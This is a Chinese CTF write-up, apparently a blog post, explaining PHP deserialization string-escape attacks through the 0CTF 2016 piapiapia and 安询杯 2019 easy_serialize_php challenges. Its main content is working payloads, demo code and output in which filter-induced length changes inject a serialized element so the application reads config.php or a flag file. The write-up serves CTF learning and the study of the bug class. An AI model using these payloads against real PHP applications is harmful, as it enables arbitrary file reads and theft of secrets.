php反序列化字符逃逸,PHP反序列化字符串逃逸

最新推荐文章于 2023-12-05 14:40:38 发布
最新推荐文章于 2023-12-05 14:40:38 发布
阅读量230 收藏 1
点赞数
文章标签: php反序列化字符逃逸

经过CTF比赛了解PHP反序列化,记录本身的学习。

借用哈大佬们的名言

任何具备必定结构的数据,若是通过了某些处理而把结构体自己的结构给打乱了,则有可能会产生漏洞。

0CTF 2016piapiapia-----反序列化后长度递增

安询杯2019-easy_serialize_php-----反序列化后长度递减

0CTF 2016piapiapia

因为是代码审计,直接访问www.zip发现备份的源码,有一下文件,flag就在config.php,所以读取便可

class.php //主要有mysql类(mysql基本操做)和user类(继承mysql实现功能点)

config.php //环境配置

index.php //登录

profile.php //查看本身上传的文件

register.php //注册

update.php //文件上传

源码分析

而后分析代码,我喜欢经过功能点来分析,既然有注册,登录,那么天然来看看SQL咯,发现class.php中mysql类的filter过滤函数,过滤了增删查改,基本无望.

后面就看看文件上传,发现也对上传的文件参数进行了限制,可是发现对文件进行了序列化处理,那么确定有反序列化,在profile.php中发现对上传的文件进行反序列化处理,并对文件$profile['photo']进行读取.咱们再回到文件上传点,发现$profile['photo'] = 'upload/' . md5($file['name']);,可是咱们没法获取加密后的文件值,后面有又看到文件上传是先序列化,再进过filter函数替换一些关键字,再反序列化,所以文件可能发生改变,所以可能有漏洞

payload构造

咱们知道,PHP反序列化时以;做为分隔点,}作为结束标志,根据长度来判断读取多少字符,咱们没法控制$profile['photo']可是能够控制nickname,而nickname又进行了长度限制,strlen函数却没法处理数组,所以用数组进行绕过便可咱们在这里截断,那么后面的则会被废弃再也不读取,而咱们要构造的的payload是,最开始的";}是为了闭合前面数组nickname的{,后面的;}是为了截断,让反序列化结束,再也不读取后面的内容,固然这些都不能是字符哈.

";}s:5:"photo";s:10:"config.php";}

这时构造了payload,那么就要来计算溢出数量了,咱们构造的payload长度为34,那么就要增长34个长度,因为where变成hacker会增长一个长度,那么咱们就须要34个where,最终payloadphp

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

原理解析

function filter($string) {

$escape = array('\'', '\\\\');

$escape = '/' . implode('|', $escape) . '/';

$string = preg_replace($escape, '_', $string);

$safe = array('select', 'insert', 'update', 'delete', 'where');

$safe = '/' . implode('|', $safe) . '/i';

return preg_replace($safe, 'hacker', $string);

}

$profile = array(

'phone'=>'01234567890',

'email'=>'12345678@11.com',

'nickname'=>array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}'),

'photo'=>'upload/'.md5('1.jpg')

);

print_r(serialize($profile));

echo PHP_EOL;

print_r(filter(serialize($profile)));

echo PHP_EOL;

var_dump(unserialize(filter(serialize($profile))));

echo PHP_EOL;

?>

输出结果展现,最开始不用进过filter函数反序列化时,nickname数组的第一个值没被截断是一个总体wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";},恰好204个长度,通过filter过滤函数后,where变成了hacker,反序列化的长度变化了,可是又只读取204的长度,则s:5:"photo";s:10:"config.php";}";}就多出来了,做为另外一个反序列化的其中一个元素,而末尾的'}又不是字符,所以被认为反序列化结束了,后面的内容被丢弃,所以能够任意读取文件.

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

array(4) {

'phone' =>

string(11) "01234567890"

'email' =>

string(15) "12345678@11.com"

'nickname' =>

array(1) {

[0] =>

string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"

}

'photo' =>

string(10) "config.php"

}

安询杯2019-easy_serialize_php

源码

$function = @$_GET['f'];

function filter($img){

$filter_arr = array('php','flag','php5','php4','fl1g');

$filter = '/'.implode('|',$filter_arr).'/i';

return preg_replace($filter,'',$img);

}

if($_SESSION){

unset($_SESSION);

}

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

extract($_POST);

if(!$function){

echo 'source_code';

}

if(!$_GET['img_path']){

$_SESSION['img'] = base64_encode('guest_img.png');

}else{

$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));

}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){

highlight_file('index.php');

}else if($function == 'phpinfo'){

eval('phpinfo();'); //maybe you can find something in here!

}else if($function == 'show_image'){

$userinfo = unserialize($serialize_info);

echo file_get_contents(base64_decode($userinfo['img']));

}

分析

源码很少,我就习惯先通读一遍再回溯可能出现的漏洞点,找可控参数.通读彻底发现可能存在的漏洞点:extract变量覆盖,file_get_contents任意文件读取.

将变量$userinfo['img']逆推回去发现,是由参数img_path控制的,可是通过sha1加密,咱们没法得知加密后内容,但结合前面的extract变量覆盖,咱们能够本身POST构造.

构造了以后,会通过序列化filter函数替换一些字符(那么此时序列化后的数据则发生了变化,可能存在漏洞),再反序列化,读取参数值.

payload构造

咱们任然利用序列化,通过过滤后长度发生变化来构造payload,首先明白序列化后,有三个元素,分别是img,user,function,而咱们能控制的只有后面两个,咱们须要构造的payload是这样的

f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}

可是不经任何改变则是这样的

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

我仍是利用截断的思想不让其读取元素img的值,咱们本身来构造这个值,只有两个参数,必须在function哪里截断,而这个反序列是长度递减,那么就是选择元素吞噬(吞噬的长度本身酌情参考,通常是到本身能控制的点就好)后面的长度,来构造本身的payload咯,咱们就选user元素吧,len('";s:8:"function";s:10:"')的长度为23,可是咱们没法构造23个长度,咱们能够多吞噬一个,24个字符,那么就用6个flag就好,可是这样后面的序列化就混乱了,咱们就要添加本身的payload,并补全.虽然这样补好了,可是只有两个元素,这里须要三个元素,咱们就再添加元素,并将后面的img进行截断

a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

a:3:{s:4:"user";s:24:"";s:8:"function";s:2:"22";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

截断只需}便可,而且不为读取的字符便可,所以添加f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";},这里咱们新增了一个元素,所以吞噬后function元素消失了,随便补充好元素便可.

原理解析

function filter($img){

$filter_arr = array('php','flag','php5','php4','fl1g');

$filter = '/'.implode('|',$filter_arr).'/i';

return preg_replace($filter,'',$img);

}

$arr = array(

"user"=>"flagflagflagflagflagflag",

"function"=>'2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}',

//"user"=>'guest',

//"function"=>'show_image',

"img"=>sha1(base64_encode('guest_img.png'))

);

print_r(serialize($arr));

echo PHP_EOL;

print_r(filter(serialize($arr)));

echo PHP_EOL;

print_r(unserialize(filter(serialize($arr))));

?>

输出展现

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

a:3:{s:4:"user";s:24:"";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

Array

(

[user] => ";s:8:"function";s:62:"2

[img] => ZDBnM19mMWFnLnBocA==

[tql] => tql

)

毛爪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF php反序列化字符逃逸
qq_43504943的博客
04-27 437
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
[安洵杯 2019]easy_serialize_php
borrrrring的博客
07-24 156
[安洵杯 2019]easy_serialize_php 点击链接,出现了php代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); }
两道题浅析PHP反序列化逃逸
最新发布
dsgdauigfs的博客
12-05 230
对于反序列化逃逸题目首先要看有没有序列化后的字符串替换,如果存在,可以说题目基本上是在考察该知识点。分析替换方式。缩短类型:基本上是靠前一个属性包含的字符串被缩短后,吞吃后一个属性;同时在后一个属性中存放需要利用的属性即可。变长类型:这个后续如果遇到相关题目会进行补充。CAP_T。
BUUCTF [安洵杯 2019]easy_serialize_php
m0_62107966的博客
09-24 572
BUUCTF [安洵杯 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化逃逸1
08-03
总之,PHP反序列化逃逸是攻击者可能利用的安全漏洞,它依赖于对序列化字符串的操控,特别是属性的数量、长度和内容。防止这种逃逸的方法包括对输入数据进行严格的验证和过滤,以及避免在不受信任的数据流中使用`...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
php绕过
qq_74071644的博客
11-29 925
PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。当MD5加密后以0E开头的字符他们==判断相等。
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 465
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
BUUCTF WEB(2020-4月刷题~)
A_dmin的博客
05-04 1095
[CISCN2019 总决赛 Day2 Web1]Easyweb [安洵杯 2019]easy_serialize_php [GXYCTF2019]BabyUpload [BJDCTF2020]EasySearch [V&N2020 公开赛]HappyCTFd [V&N2020 公开赛]CHECKIN
8月7日CTF反序列化训练
slc3315的博客
08-08 1618
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
[安洵杯 2019]easy_serialize_php反序列化对象逃逸
sGanYu
11-02 3787
知识点: get与post传参 反序列化漏洞 反序列化中对象逃逸 file_get_contents函数 单击sourc_code跳出源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; ret
easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1736
0x01、Web 1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1972
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
PHP反序列化逃逸详解与示例
PHP反序列化漏洞的利用通常涉及到对序列化字符串的精确操纵,以便在反序列化时执行恶意代码或改变对象的状态。这种漏洞可能存在于使用`unserialize`函数且不进行充分输入验证的代码中,因此在处理用户提供的数据时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值